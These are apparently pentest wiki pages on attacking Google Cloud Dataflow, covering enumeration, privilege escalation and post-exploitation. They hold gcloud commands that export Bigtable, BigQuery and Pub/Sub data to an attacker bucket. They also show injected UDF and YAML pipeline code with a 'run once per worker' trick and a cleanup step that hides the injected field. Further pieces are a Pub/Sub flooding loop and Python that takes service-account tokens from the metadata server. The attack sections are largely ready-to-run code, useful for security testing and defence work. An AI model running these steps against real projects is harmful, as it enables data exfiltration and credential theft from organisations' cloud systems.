# GCP - Dataflow Post Exploitation

{{#include ../../../banners/hacktricks-training.md}}

## Dataflow

For more information about Dataflow, check:

{{#ref}}
../gcp-services/gcp-dataflow-enum.md
{{#endref}}

### Abusing Dataflow to exfiltrate data from other services

**Permissions:** `dataflow.jobs.create`, `resourcemanager.projects.get`, `iam.serviceAccounts.actAs` (over an SA with access to both the source and the sink)

With permission to create Dataflow jobs, you can use GCP Dataflow templates to export data from services such as Bigtable, BigQuery, or Pub/Sub into an attacker-controlled GCS bucket. This is a powerful post-exploitation technique once you gain Dataflow access (for example via the [Dataflow Rider](../gcp-privilege-escalation/gcp-dataflow-privesc.md) privilege escalation, which hijacks pipelines through bucket writes).

> [!NOTE]
> You need `iam.serviceAccounts.actAs` over a service account (SA) with enough permissions to read the source and write to the sink. If none is specified, the Compute Engine default SA is used.

#### Bigtable to GCS

See [GCP - Bigtable Post Exploitation](gcp-bigtable-post-exploitation.md#dump-rows-to-your-bucket) — "Dump rows to your bucket" for the full pattern. Templates: `Cloud_Bigtable_to_GCS_Json`, `Cloud_Bigtable_to_GCS_Parquet`, `Cloud_Bigtable_to_GCS_SequenceFile`.

<details>

<summary>Export Bigtable to an attacker-controlled bucket</summary>

```bash
gcloud dataflow jobs run <job-name> \
  --gcs-location=gs://dataflow-templates-us-<REGION>/<VERSION>/Cloud_Bigtable_to_GCS_Json \
  --project=<PROJECT> \
  --region=<REGION> \
  --parameters=bigtableProjectId=<PROJECT>,bigtableInstanceId=<INSTANCE_ID>,bigtableTableId=<TABLE_ID>,filenamePrefix=<PREFIX>,outputDirectory=gs://<YOUR_BUCKET>/raw-json/ \
  --staging-location=gs://<YOUR_BUCKET>/staging/
```
</details>

#### BigQuery to GCS

Dataflow templates exist to export BigQuery data. Use a template matching the target format (JSON, Avro, etc.) and point the output at your bucket.

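As an illustration, launching the Google-provided `BigQuery_to_Parquet` Flex Template could look like the following sketch (template path and parameter names should be checked against the current template catalog; every `<...>` value is a placeholder):

```bash
gcloud dataflow flex-template run bq-exfil-job \
  --project=<PROJECT> \
  --region=<REGION> \
  --template-file-gcs-location=gs://dataflow-templates-<REGION>/latest/flex/BigQuery_to_Parquet \
  --parameters=tableRef=<PROJECT>:<DATASET>.<TABLE>,bucket=gs://<YOUR_BUCKET>/bq-export/
```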
#### Pub/Sub and streaming sources

Streaming pipelines can read from Pub/Sub (or other sources) and write to GCS. Launch a job with a template that reads from the target Pub/Sub subscription and writes to a bucket you control.

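For example, the Google-provided `Cloud_PubSub_to_GCS_Text` classic template streams messages into text files in a bucket; a sketch of such a launch (parameter names follow the public template docs and should be verified; all `<...>` values are placeholders):

```bash
gcloud dataflow jobs run psub-exfil-job \
  --gcs-location=gs://dataflow-templates-<REGION>/latest/Cloud_PubSub_to_GCS_Text \
  --project=<PROJECT> \
  --region=<REGION> \
  --parameters=inputSubscription=projects/<PROJECT>/subscriptions/<SUBSCRIPTION>,outputDirectory=gs://<YOUR_BUCKET>/psub/,outputFilenamePrefix=out-
```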
## References

- [Dataflow templates](https://cloud.google.com/dataflow/docs/guides/templates/provided-templates)
- [Control access with IAM (Dataflow)](https://cloud.google.com/dataflow/docs/concepts/security-and-permissions)
- [GCP - Bigtable Post Exploitation](gcp-bigtable-post-exploitation.md)

{{#include ../../../banners/hacktricks-training.md}}
# GCP - Dataflow Privilege Escalation

{{#include ../../../banners/hacktricks-training.md}}

## Dataflow

{{#ref}}
../gcp-services/gcp-dataflow-enum.md
{{#endref}}

### `storage.objects.create`, `storage.objects.get`, `storage.objects.update`

Dataflow does not verify the integrity of UDFs and job template YAML stored in GCS.
With write access to the bucket you can overwrite these files to inject code, execute it on the workers, steal service account tokens, or alter the data processing flow. Both batch and streaming pipeline jobs are viable targets. To carry out the attack you must replace the UDFs/templates before the job runs, during the first minutes after it starts (before the job's workers are created), or while a job is running before new workers spin up due to autoscaling.

**Attack vectors:**

- **UDF hijacking:** Python (`.py`) and JS (`.js`) UDFs referenced by pipelines and stored in customer-managed buckets
- **Job template hijacking:** Custom YAML pipeline definitions stored in customer-managed buckets

> [!WARNING]
> **Run-once-per-worker trick:** Dataflow UDFs and template callables are invoked **per row/line**. Without coordination, exfiltration or token theft executes thousands of times, causing noise, rate limiting, and detection. Use a **file-based coordination** pattern: at the start, check whether a marker file (e.g. `/tmp/pwnd.txt`) exists; if it does, skip the malicious code; if not, run the payload and create the file. This ensures the payload runs **once per worker** instead of once per line.

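The coordination pattern can be demonstrated locally; `payload()` and the marker path are hypothetical stand-ins (on a real worker the marker would be `/tmp/pwnd.txt`):

```python
import os
import tempfile

# Hypothetical marker path; a real worker would use /tmp/pwnd.txt
MARKER = os.path.join(tempfile.gettempdir(), "pwnd_demo.txt")
calls = {"payload_runs": 0}

def payload():
    # Stand-in for exfiltration / token theft
    calls["payload_runs"] += 1

def transform(line):
    # Invoked once per row; the marker file gates the payload
    try:
        if not os.path.exists(MARKER):
            payload()
            with open(MARKER, "w", encoding="utf-8") as f:
                f.write("done")
    except Exception:
        pass
    return line  # original UDF logic would follow

if os.path.exists(MARKER):
    os.remove(MARKER)
for row in ["a", "b", "c", "d"]:
    transform(row)
print(calls["payload_runs"])  # 1: the payload ran once despite four rows
```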
#### Direct exploitation via gcloud CLI

1. Enumerate Dataflow jobs and locate the template/UDF GCS paths:

<details>

<summary>List jobs and describe to get template path, staging location, and UDF references</summary>

```bash
# List jobs (optionally filter by region)
gcloud dataflow jobs list --region=<region>
gcloud dataflow jobs list --project=<PROJECT_ID>

# Describe a job to get template GCS path, staging location, and any UDF/template references
gcloud dataflow jobs describe <JOB_ID> --region=<region> --full --format="yaml"
# Look for: currentState, createTime, jobMetadata, type (JOB_TYPE_STREAMING or JOB_TYPE_BATCH)
# Pipeline options often include: tempLocation, stagingLocation, templateLocation, or flexTemplateGcsPath
```
</details>

2. Download the original UDF or job template from GCS:

<details>

<summary>Download the UDF file or YAML template from the bucket</summary>

```bash
# If job references a UDF at gs://bucket/path/to/udf.py
gcloud storage cp gs://<BUCKET>/<PATH>/<udf_file>.py ./udf_original.py

# Or for a YAML job template
gcloud storage cp gs://<BUCKET>/<PATH>/<template>.yaml ./template_original.yaml
```
</details>

3. Edit the file locally: inject the malicious payload (see the Python UDF or YAML snippets below) and make sure it uses the run-once coordination pattern.

4. Re-upload to overwrite the original file:

<details>

<summary>Overwrite the UDF or template in the bucket</summary>

```bash
gcloud storage cp ./udf_injected.py gs://<BUCKET>/<PATH>/<udf_file>.py

# Or for YAML
gcloud storage cp ./template_injected.yaml gs://<BUCKET>/<PATH>/<template>.yaml
```
</details>

5. Wait for the next job run, or (for streaming) trigger autoscaling (e.g. by flooding the pipeline input) so new workers start and pull the modified files.

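For a Pub/Sub-fed pipeline, one way to force autoscaling is to flood the input topic; a rough sketch (topic name and message volume are illustrative):

```bash
# Publish a burst of junk messages to the pipeline's input topic
for i in $(seq 1 10000); do
  gcloud pubsub topics publish <INPUT_TOPIC> --message="junk-$i"
done
```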
#### Python UDF injection

If you want the worker to exfiltrate data to your C2 server, use `urllib.request` instead of `requests`:
`requests` is not preinstalled on classic Dataflow workers.

<details>

<summary>Malicious UDF with run-once coordination and metadata extraction</summary>

```python
import os
import json
import urllib.request
from datetime import datetime

def _malicious_func():
    # File-based coordination: run once per worker.
    coordination_file = "/tmp/pwnd.txt"
    if os.path.exists(coordination_file):
        return

    # malicious code goes here

    with open(coordination_file, "w", encoding="utf-8") as f:
        f.write("done")

def transform(line):
    # Malicious code entry point - runs per line, but coordination ensures once per worker
    try:
        _malicious_func()
    except Exception:
        pass
    # ... original UDF logic follows ...
```
</details>

#### Job template YAML injection
Inject a `MapToFields` step whose callable uses the coordination file. For YAML-based pipelines, use `requests` if the template declares `dependencies: [requests]` and supports it; otherwise prefer `urllib.request`.

Add a cleanup step (`drop: [malicious_step]`) so the pipeline still writes valid data to its destination.

<details>

<summary>Malicious MapToFields step and cleanup in the pipeline YAML</summary>

```yaml
- name: MaliciousTransform
  type: MapToFields
  input: Transform
  config:
    language: python
    fields:
      malicious_step:
        callable: |
          def extract_and_return(row):
            import os
            import json
            from datetime import datetime
            coordination_file = "/tmp/pwnd.txt"
            if os.path.exists(coordination_file):
              return True
            try:
              import urllib.request
              # malicious code goes here
              with open(coordination_file, "w", encoding="utf-8") as f:
                f.write("done")
            except Exception:
              pass
            return True
    append: true
- name: CleanupTransform
  type: MapToFields
  input: MaliciousTransform
  config:
    fields: {}
    append: true
    drop:
      - malicious_step
```
</details>

### Compute Engine access to Dataflow workers

**Permissions:** `compute.instances.osLogin` or `compute.instances.osAdminLogin` (with `iam.serviceAccounts.actAs` over the worker SA), or `compute.instances.setMetadata` / `compute.projects.setCommonInstanceMetadata` (with `iam.serviceAccounts.actAs`) for legacy SSH key injection
Dataflow workers run as Compute Engine VMs. Access to the workers via OS Login or SSH lets you read SA tokens from the metadata endpoint (`http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token`), manipulate data, or run arbitrary code.

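From a shell on a worker, the token grab can be sketched with only the Python standard library; `steal_token` assumes you are running inside the VM, since the metadata server is only reachable there:

```python
import json
import urllib.request

METADATA_URL = ("http://169.254.169.254/computeMetadata/v1/"
                "instance/service-accounts/default/token")

def build_token_request():
    # The metadata server rejects requests without this header
    return urllib.request.Request(METADATA_URL, headers={"Metadata-Flavor": "Google"})

def steal_token():
    # Only works from inside the worker VM (e.g. over OS Login / SSH)
    with urllib.request.urlopen(build_token_request(), timeout=5) as resp:
        return json.loads(resp.read())["access_token"]
```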
For exploitation details, see:

- [GCP - Compute Privesc](gcp-compute-privesc/README.md) — `compute.instances.osLogin`, `compute.instances.osAdminLogin`, `compute.instances.setMetadata`

## References

- [Dataflow Rider: How Attackers can Abuse Shadow Resources in Google Cloud Dataflow](https://www.varonis.com/blog/dataflow-rider)
- [Control access with IAM (Dataflow)](https://cloud.google.com/dataflow/docs/concepts/security-and-permissions)
- [gcloud dataflow jobs describe](https://cloud.google.com/sdk/gcloud/reference/dataflow/jobs/describe)
- [Apache Beam YAML: User-defined functions](https://beam.apache.org/documentation/sdks/yaml-udf/)
- [Apache Beam YAML Transform Reference](https://beam.apache.org/releases/yamldoc/current/)

{{#include ../../../banners/hacktricks-training.md}}
# GCP - Dataflow Enum

{{#include ../../../banners/hacktricks-training.md}}

## Basic Information

**Google Cloud Dataflow** is a fully managed service for **batch and streaming data processing**. It lets organizations build pipelines that transform and analyze data at scale, integrating with Cloud Storage, BigQuery, Pub/Sub, and Bigtable. Dataflow pipelines run on worker VMs in your project; templates and User-Defined Functions (UDFs) are typically stored in GCS buckets. [Learn more](https://cloud.google.com/dataflow).

## Components

A Dataflow pipeline typically involves:

**Template:** A YAML or JSON definition (plus Python/Java code for flex templates) stored in GCS that defines the pipeline's structure and steps.

**Launcher (Flex Templates):** A short-lived Compute Engine instance may be used when launching a Flex Template to validate the template and prepare the container before the job runs.

**Workers:** Compute Engine VMs that perform the actual data processing, pulling UDFs and instructions from the template.

**Staging/Temp buckets:** GCS buckets used to store temporary pipeline data, job artifacts, UDF files, and flex template metadata (`.json`).

## Batch vs Streaming Jobs

Dataflow supports two execution modes:

**Batch jobs:** Process a fixed, bounded dataset (e.g. log files, table exports). The job runs once to completion and then terminates. Workers are created for the duration of the job and shut down when it finishes. Batch jobs are typically used for ETL, historical analysis, or scheduled data migrations.

**Streaming jobs:** Process unbounded, continuously arriving data (e.g. Pub/Sub messages, real-time sensor data). The job runs until explicitly stopped. Workers may scale dynamically with autoscaling; new workers pull pipeline components (templates, UDFs) from GCS at startup.

## Enumeration

Dataflow jobs and related resources can be enumerated to collect service accounts, template paths, staging buckets, and UDF locations.

### Job Enumeration

To enumerate Dataflow jobs and retrieve their details:
```bash
# List Dataflow jobs in the project
gcloud dataflow jobs list
# List Dataflow jobs (by region)
gcloud dataflow jobs list --region=<region>

# Describe job (includes service account, template GCS path, staging location, parameters)
gcloud dataflow jobs describe <job-id> --region=<region>
```

The job description reveals the template's GCS path, the staging location, and the worker service account, which helps identify the buckets holding the pipeline components.

### Template and Bucket Enumeration

Buckets referenced in job descriptions may contain flex templates, UDFs, or YAML pipeline definitions:
```bash
# List objects in a bucket (look for .json flex templates, .py UDFs, .yaml pipeline defs)
gcloud storage ls gs://<bucket>/

# List objects recursively
gcloud storage ls gs://<bucket>/**
```

## Privilege Escalation

{{#ref}}
../gcp-privilege-escalation/gcp-dataflow-privesc.md
{{#endref}}

## Post Exploitation

{{#ref}}
../gcp-post-exploitation/gcp-dataflow-post-exploitation.md
{{#endref}}

## Persistence

{{#ref}}
../gcp-persistence/gcp-dataflow-persistence.md
{{#endref}}

## References

- [Dataflow overview](https://cloud.google.com/dataflow)
- [Pipeline workflow execution in Dataflow](https://cloud.google.com/dataflow/docs/guides/pipeline-workflows)
- [Troubleshoot templates](https://cloud.google.com/dataflow/docs/guides/troubleshoot-templates)

{{#include ../../../banners/hacktricks-training.md}}